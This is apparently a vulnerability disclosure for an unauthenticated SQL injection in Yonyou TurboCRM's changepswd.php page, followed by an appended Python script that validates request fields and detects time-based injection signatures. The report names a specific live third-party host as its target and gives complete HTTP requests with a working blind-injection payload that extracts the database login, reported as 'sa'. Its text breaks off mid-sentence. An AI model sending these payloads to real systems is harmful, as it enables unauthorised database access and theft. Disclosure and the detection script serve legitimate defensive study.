### Summary:

SQL injection in a Yonyou system: no login required, affects every version.

### Details:

Yonyou TurboCRM has a generic SQL injection.

http://crm.varsal.com.cn:8081/login/login.php

Locate the password-recovery page as shown below:

![wooyun.jpg](https://images.seebug.org/upload/201409/1513060665d1fde2cc208efbd0638610d9a9e963.jpg)

Visit http://crm.varsal.com.cn:8081/login/changepswd.php?orgcode=1&loginname=system

![wooyun1.png](https://images.seebug.org/upload/201409/15130814c63a590e2a751d0369ff96fe72b8a303.png)

Fill in the form and capture the request:

```
POST /login/changepswd.php?orgcode=1&loginname=system HTTP/1.1
Host: crm.varsal.com.cn:8081
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://crm.varsal.com.cn:8081/login/changepswd.php?orgcode=1&loginname=system
Content-Length: 95
Cookie: PHPSESSID=8a4jg4pb034v5dcbachfllljd1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

submit=1&oldpassword=aaaaa&password=aaaaaa&confirmpswd=aaaaaa&orgcode=1&loginname=system&key=-1
```

![wooyun2.png](https://images.seebug.org/upload/201409/151309383293210d406e065240c7dcb62a3057c0.png)

Injection technique: Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

Affected:

### Proof of vulnerability:

POC

```
POST /login/changepswd.php?orgcode=1&loginname=system HTTP/1.1
Accept-language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Host: crm.varsal.com.cn:8081
Referer: http://crm.varsal.com.cn:8081/login/changepswd.php?orgcode=1&loginname=system
Pragma: no-cache
Cache-control: no-cache
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=8a4jg4pb034v5dcbachfllljd1
Content-length: 276
Connection: close

submit=1&oldpassword=aaaaa&password=aaaaaa&confirmpswd=aaaaaa&orgcode=1%27%20IF%28UNICODE%28SUBSTRING%28%28SELECT%20ISNULL%28CAST%28SYSTEM_USER%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C3%2C1%29%29%3E1%29%20WAITFOR%20DELAY%20%270%3A0%3A1%27--&loginname=system&key=-1
```

Database user: sa. There is also a whole series of Yonyou
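As an added defender-side example (not code from the report or from the TurboCRM product), the two checks that stop this class of request at `changepswd.php`: strict integer typing of `orgcode` and `key` before any query is built, plus a signature scan of every decoded field that catches the `WAITFOR DELAY` inference shape used above. It generalises beyond the page's MSSQL payload to MySQL/PostgreSQL delay primitives and to double-URL-encoded fields; the field names and sample bodies follow the captured request, and the helper names are this example's own.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Time-delay primitives used by time-based blind injection. WAITFOR DELAY is the
# MSSQL form shown in the report; the others extend the same check to MySQL/PostgreSQL.
TIME_BASED_SQLI = re.compile(
    r"\bWAITFOR\s+DELAY\b|\bSLEEP\s*\(|\bBENCHMARK\s*\(|\bPG_SLEEP\s*\(",
    re.IGNORECASE,
)
# In every legitimate request on the page, orgcode and key are short integers.
INTEGER_FIELD = re.compile(r"^-?\d{1,9}$")


def fully_decoded(value: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of URL-encoding, so a %2527-style double-encoded
    quote is inspected as the quote it becomes once the application decodes again."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_form_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into {name: first value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def audit_changepswd_request(body: str) -> list:
    """Findings for one POST body to changepswd.php; an empty list means well-formed.
    Check 1 is the fix the application itself needs (reject non-integer orgcode/key
    before touching the database); check 2 suits log review or a WAF rule."""
    findings = []
    fields = parse_form_body(body)
    for name in ("orgcode", "key"):
        value = fields.get(name, "")
        if not INTEGER_FIELD.fullmatch(value):
            findings.append(f"{name}: expected integer, got {value[:40]!r}")
    for name, value in fields.items():
        if TIME_BASED_SQLI.search(fully_decoded(value)):
            findings.append(f"{name}: time-based SQL injection signature")
    return findings


if __name__ == "__main__":
    # Constructed samples: the legitimate body captured on the page, then the same body
    # with orgcode carrying the report's shape (quote, IF(...) inference, WAITFOR DELAY).
    benign = "submit=1&oldpassword=aaaaa&password=aaaaaa&confirmpswd=aaaaaa&orgcode=1&loginname=system&key=-1"
    probe = benign.replace("orgcode=1", "orgcode=1%27%20IF%281%3E0%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--")
    print(audit_changepswd_request(benign))  # []
    print(audit_changepswd_request(probe))
```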